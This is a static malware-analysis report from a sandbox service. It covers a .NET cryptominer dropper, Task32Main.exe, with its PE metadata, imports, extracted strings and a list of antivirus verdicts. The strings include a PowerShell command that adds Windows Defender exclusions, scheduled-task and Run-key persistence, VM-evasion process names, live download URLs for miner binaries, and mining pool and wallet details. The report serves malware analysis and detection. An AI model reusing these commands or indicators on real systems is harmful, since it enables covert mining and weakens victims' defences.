popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2051-12-11 12:03:22

PDB Path

C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00004640 0x00004800 5.39735109059
.rsrc 0x00008000 0x000006b8 0x00000800 3.87840901197
.reloc 0x0000a000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00008090 0x000003aa LANG_NEUTRAL SUBLANG_NEUTRAL Dyalog APL workspace 32-bit classic big-endian version 52.0
RT_MANIFEST 0x0000844c 0x00000268 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
string_b10
<>9__36_0
<RS>b__36_0
string_b11
string_1
bool_1
IEnumerable`1
List`1
string_b1
string_b12
Microsoft.Win32
ToInt32
string_2
Func`2
string_b2
string_b13
string_3
string_b3
string_b14
ToInt64
string_4
string_b4
string_b15
string_5
string_b5
string_b16
string_6
string_b6
string_7
string_b7
string_w7
string_8
string_b8
string_9
string_b9
<Module>
System.IO
mscorlib
set_Verb
System.Collections.Generic
DownloadFileAsync
OpenRead
Thread
Synchronized
ClassItemField
ConnectToInterface
MakeSpace
defaultInstance
set_AutoScaleMode
FileMode
get_Unicode
Enumerable
IDisposable
Double
RuntimeTypeHandle
GetTypeFromHandle
set_FormBorderStyle
set_WindowStyle
ProcessWindowStyle
get_ExStyle
set_ExStyle
set_Name
get_ProcessName
GetProcessesByName
ReadLine
WriteLine
LocalMachine
SecurityProtocolType
InitializeHardware
CheckSystemHardware
System.Core
get_Culture
set_Culture
resourceCulture
ApplicationSettingsBase
Dispose
TryParse
Create
EditorBrowsableState
Delete
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
isexecute
DeleteValue
GetValue
Task32Main.exe
set_ClientSize
System.Threading
Encoding
System.Runtime.Versioning
ToBase64String
ToString
disposing
System.Drawing
IsMatch
GetTempPath
GetFolderPath
get_Length
System.ComponentModel
set_SecurityProtocol
ContainerControl
FileStream
getparam
Program
get_Item
System
Random
resourceMan
Task32Main
set_ShowIcon
Application
System.Configuration
System.Globalization
System.Reflection
ManagementObjectCollection
FileInfo
GetHardwareInfo
CultureInfo
FileSystemInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
System.Linq
set_ShowInTaskbar
StreamReader
TextReader
SpecialFolder
get_ResourceManager
ServicePointManager
ManagementObjectSearcher
System.CodeDom.Compiler
IContainer
CurrentUser
StreamWriter
TextWriter
ManagementObjectEnumerator
GetEnumerator
.cctor
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Task32Main.Properties.Resources.resources
Task32Main.Fregat.resources
DebuggingModes
Task32Main.Properties
EnableVisualStyles
GetValueNames
GetSubKeyNames
GetProcesses
set_Attributes
FileAttributes
GetBytes
Settings
Equals
get_CreateParams
System.Windows.Forms
set_AutoScaleDimensions
System.Text.RegularExpressions
get_Chars
WIN32_Class
FileAccess
GetCurrentProcess
set_Arguments
components
Exists
Concat
Repeat
Fregat
ManagementBaseObject
ManagementObject
CloseProject
Select
System.Net
get_Default
SetCompatibleTextRenderingDefault
WebClient
System.Management
Environment
InitializeComponent
get_Current
AutoStart
Convert
SuspendLayout
ResumeLayout
MoveNext
System.Text
set_Text
set_CreateNoWindow
ToArray
OpenSubKey
RegistryKey
get_Assembly
CreateDirectory
Registry
set_Opacity
op_Equality
op_Inequality
WrapNonExceptionThrows
Programs Engine
Microsoft
Windows
Copyright
2021
$d45ad80b-f521-49c4-8aea-bfca2f21b9bf
10.0.19041.746
.NETFramework,Version=v4.6.1
FrameworkDisplayName
.NET Framework 4.6.1
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.10.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
RSDS%s
C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
</application>
</compatibility>
</assembly>
winlogson.exe
WinRing0x64.sys
dllhost.exe
/C powershell -EncodedCommand "
#> Add-MpPreference <#
#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#
#> -Force <#
" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
cmd.exe
Windows Server [0-9]{4}|Server|XP|Vista|Educational|Workstation(\w?)
APU|COPMUTE CORES(\w?)
Win32_Processor
Win32_OperatingSystem
Caption
Vmtoolsd
Vmwaretrat
Vmwareuser
Vmacthlp
vboxservice
vboxtray
root\CIMV2
SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
TotalPhysicalMemory
SELECT * FROM
Software\Microsoft\Windows\CurrentVersion\Run\
dllhost
NordVPN
Discord
EpicGamesLauncher
OneDrive
SecurityHealthSystray
WindowsDefender
Cortana
WmiPrvSE
AntiMalwareServiceExecutable
101XPGameCenter
FACEIT
Opera GX Browseer Assistant
Spotify
Voicemod
Wargaming.net Game Center
Gaijin.Net Updater
RegSvc
MicrosoftEdgeUpd
OneDriveService
NvStray
C:\Windows\System32\Tasks\NvStray\
/c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "
" /TR "
dllhost.exe"
/c SCHTASKS /CREATE /SC HOURLY /TN "
Service_bk
conhost
abcdefhijlmnopqstuvwxyABCDEGHJKLMNORSTUVWYZ012356789
adeghijkmnorstuvyzACFGHJKLNOQSXZ013468
logs.uce
SystemErrorReports.log
dxdiag.bin
dxlog.log
SystemInterrupts.tmp
LogSystemData.log
ReportError.bin
datafiles\
RuntimeBrokerLogs\
winSecurityHealthStray\
mib.bin
SYSTEM\CurrentControlSet\Control\Video\
HardwareInformation.qwMemorySize
http://185.215.113.51/WatchDog.exe
http://185.215.113.51/lolMiner.exe
http://185.215.113.51/xmrig.exe
ETCHASH
etc.2miners.com:1010
0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972
pool.hashvault.pro:443
ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t
F(Ff4f67h((jgf
http://185.215.113.51/WinRing0x64.sys
https://pastebin.com/raw/YpJeSRBC
Dllhost\
HostData\
ProgramV3
Task32Main.Properties.Resources
winlogson
dllhost
conhost
WinRing0x64.sys
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Programs Engine
CompanyName
Microsoft
Windows
FileDescription
Programs Engine
FileVersion
10.0.19041.746
InternalName
Task32Main.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Task32Main.exe
ProductName
Programs Engine
ProductVersion
10.0.19041.746
Assembly Version
10.0.19041.746
Antivirus Signature
Bkav Clean
Lionic Trojan.Win32.Miner.a!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Jalapeno.12820
CMC Clean
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
Skyhigh ACL/Generic Coinminer.VNWH
ALYac Gen:Variant.Jalapeno.12820
Cylance Unsafe
Zillya Trojan.CoinMiner.Win32.49859
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanDownloader:MSIL/Tasker.0a4af6b2
K7GW Trojan ( 0058f7721 )
K7AntiVirus Trojan ( 0058f7721 )
huorong TrojanDropper/MSIL.Agent.eo
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/CoinMiner.BSJ
APEX Clean
Avast Win32:CoinminerX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.MSIL.Miner.gen
BitDefender Gen:Variant.Jalapeno.12820
NANO-Antivirus Trojan.Win32.Miner.kvcqvr
ViRobot Clean
Tencent Malware.Win32.Gencirc.14297180
Sophos Mal/ILAgent-B
F-Secure Heuristic.HEUR/AGEN.1365229
DrWeb Trojan.BtcMine.3634
VIPRE Gen:Variant.Jalapeno.12820
TrendMicro Clean
McAfeeD Real Protect-LS!C11A82D699A0
Trapmine Clean
CTX exe.trojan.msil
Emsisoft Gen:Variant.Jalapeno.12820 (B)
Ikarus Trojan.MSIL.CoinMiner
FireEye Generic.mg.c11a82d699a06d9b
Jiangmin Clean
Webroot Clean
Varist W32/MSIL_Kryptik.HRL.gen!Eldorado
Avira HEUR/AGEN.1365229
Fortinet MSIL/CoinMiner.BSJ!tr
Antiy-AVL Clean
Kingsoft MSIL.Trojan-Downloader.Miner.gen
Gridinsoft Risk.CoinMiner.C.sd!yf
Xcitium Malware@#1w7onykqyop6m
Arcabit Trojan.Jalapeno.D3214
SUPERAntiSpyware Clean
Microsoft Trojan:MSIL/Tasker!MTB
Google Detected
AhnLab-V3 Trojan/Win.RealProtect-LS.C5207348
Acronis Clean
McAfee ACL/Generic Coinminer.VNWH
TACHYON Clean
VBA32 Downloader.MSIL.Pabin.Heur
Malwarebytes BitcoinMiner.Trojan.Miner.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.CoinMiner!8.30A (CLOUD)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
GData MSIL.Trojan.Agent.BAW
AVG Win32:CoinminerX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan[dropper]:Win/Agent.VDD
No IRMA results available.